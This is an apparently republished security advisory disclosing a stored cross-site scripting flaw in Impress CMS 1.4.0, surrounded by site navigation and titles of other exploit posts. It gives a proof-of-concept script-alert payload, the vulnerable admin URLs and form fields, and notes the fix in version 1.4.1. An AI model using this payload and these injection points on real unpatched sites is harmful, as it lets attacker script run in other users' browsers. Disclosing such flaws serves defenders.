Impress CMS 1.4.0 Cross Site Scripting ≈ Packet Storm

Roger Wilco Exploits 11 juillet 2020 Affichages : 281

#Author: AppleBois
#Homepage: https://sourceforge.net/projects/impresscms/
#Affected Version: 1.4.0
#Stored XSS
#Allows an attacker to execute arbitrary HTML and JavaScript code
#Solution: Update to 1.4.1 
#More information : https://github.com/ImpressCMS/impresscms/issues/659
Payload = <script>alert('AppleBois');</script>
Vulnerable URL :modules/system/admin.php?fct=adsense&op=mod&adsenseid=4
Vulnerable TextBar : ID of the [adsense tag to display this ad]
Vulnerable URL :/modules/system/admin.php?fct=customtag&op=mod
Vulnerable TextBar : Name

WHAT ARE YOU LOOKING FOR?

Popular Tags

Impress CMS 1.4.0 Cross Site Scripting ≈ Packet Storm

Follow us on

Most popular

Tiki Wiki CMS Groupware 21.1 Authentication Bypass ≈ Packet Storm

Aimeos Laravel Ecommerce Platform 2021.10 LTS SQL Injection ≈ Packet Storm

OpenSMTPD Out-Of-Bounds Read / Local Privilege Escalation ≈ Packet Storm

Phone Shop Sales Managements System 1.0 Shell Upload ≈ Packet Storm

Monitorr 1.7.6m Authorization Bypass ≈ Packet Storm

Tomato: 1 Vulnhub Walkthrough

Category

Popular Sections

About